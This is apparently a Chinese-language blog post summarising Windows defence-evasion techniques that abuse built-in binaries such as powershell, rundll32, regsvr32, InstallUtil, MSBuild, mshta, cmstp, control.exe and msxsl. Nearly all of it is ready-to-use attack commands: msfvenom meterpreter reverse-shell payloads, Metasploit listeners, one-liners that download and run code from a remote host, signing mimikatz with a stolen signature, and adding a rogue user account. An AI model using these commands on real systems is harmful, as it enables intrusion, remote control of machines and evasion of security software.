Windows命令執(zhí)行防御規(guī)避總結(jié)
今天小編為大家?guī)?lái)Windows命令執(zhí)行防御規(guī)避總結(jié),具體如下:
powershell
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:8888/logo.gif’))”“ /f
SIP
通過(guò)sip劫持對(duì)惡意代碼簽名獲得系統(tǒng)信任https://github.com/secretsquirrel/SigThief
python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe
rundll32.exe
生成
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll
目標(biāo)執(zhí)行
rundll32.exe shell32.dll,Control_RunDLL xxx.dll
Regsvr32.exe
msfconsole
auxiliary/server/regsvr32_command_delivery_server
set CMD net user test 123456 /add
目標(biāo)執(zhí)行
regsvr32 /s /n /u /i:http://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll
InstallUtil.exe
1.編譯后門:
C:WindowsMicrosoft.NETFramework64v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:Program Files (x86)Microsoft SDKsWindowsv10.0AbinNETFX 4.8 Toolsx64key.snk“ xxx.cs
2.靶機(jī)上運(yùn)行:
InstallUtil.exe /U xxx.exe
3.msf監(jiān)聽(tīng),得到反彈的shell:
set payload windows/x64/meterpreter/reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT 4444
exploit
Msbuild.exe
MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺(tái),MSBuild可編譯特定格式的xml文件
https://github.com/3gstudent/msbuild-inline-task
msf生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444
-f csharp
使用shellcode替換https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分
msf監(jiān)聽(tīng)
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost xx.xx.xx.xx
set lport 4444
exploit
運(yùn)行
C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe exec64.xml
CMSTP
cmstp.exe /s /ns C:UsersadministratorAppDataLocalTempXKNqbpzl.txt繞過(guò)AppLocker并啟動(dòng)惡意腳本
Mshta.exe
Mshta.exe 是一個(gè)執(zhí)行 Microsoft HTML 應(yīng)用程序 (HTA) 的實(shí)用程序,攻擊者可以使用 mshta.exe 通過(guò)受信任的 Windows 實(shí)用程序代理執(zhí)行惡意代碼
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx
msf exploit(windows/misc/hta_server) 》 exploit
mshta.exe http://xx.xx.xx.xx:8080/xxxxxxx.hta
控制面板
攻擊者可以使用控制面板項(xiàng)作為有效載荷來(lái)執(zhí)行任意命令,控制面板項(xiàng)是注冊(cè)的可執(zhí)行文件(.exe)或控制面板(.cpl)文件,可以直接從命令行執(zhí)行或通過(guò)Control_RunDLL(API)調(diào)用或者直接雙擊文件。
攻擊者構(gòu)造惡意的dll文件CPIApplet.dll
利用msf生成dll文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll
傳入windows機(jī)器,然后重命名為CPIApplet.cpl,通過(guò)control.exe c:usersadministratordesktopCPIApplet.cpl 執(zhí)行命令
通過(guò)msxsl.exe調(diào)用惡意xml文件執(zhí)行腳本
制作兩個(gè)文件
customers.xml
script.xsl
xmlns:xsl=”http://www.w3.org/1999/XSL/Transform“
xmlns:msxsl=”urn:schemas-microsoft-com:xslt“
xmlns:user=”http://mycompany.com/mynamespace“》
function xml(nodelist) {
var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);
return nodelist.nextNode().xml;
}
開(kāi)啟http服務(wù)
python3 -m http.server 80
遠(yuǎn)程下載執(zhí)行
msxsl.exe http://xx.xx.xx.xx/customers.xml http://xx.xx.xx.xx/scrip.xsl
相關(guān)文章:
1. 收到Win11推送了嗎?微軟要對(duì)Win11首個(gè)正式版強(qiáng)制升級(jí)了!2. 請(qǐng)盡快升級(jí): Ubuntu 18.04 LTS 和 Linux Mint 19.x 發(fā)行版將于 4 月停止支持3. 微軟規(guī)劃提升 Win10 / Win11圖形和音頻驅(qū)動(dòng)質(zhì)量4. Ubuntu 20.04.2 發(fā)布,包括中國(guó)版的優(yōu)麒麟5. 統(tǒng)信UOS怎么增加刪除字體? UOS系統(tǒng)添加移除字體的技巧6. 統(tǒng)信UOS怎么新建賬戶? UOS添加多個(gè)用戶帳號(hào)的技巧7. mac文本怎么添加快捷短語(yǔ)? mac電腦添加快捷文本短語(yǔ)的技巧8. 蘋果macOS Ventura 13.3 首個(gè) Public Beta 測(cè)試版本發(fā)布9. Win11 USB接口不能用怎么辦? Win11電腦USB接口沒(méi)反應(yīng)的解決辦法10. 關(guān)于linux(ubuntu 18.04) 中idea操作數(shù)據(jù)庫(kù)失敗的問(wèn)題
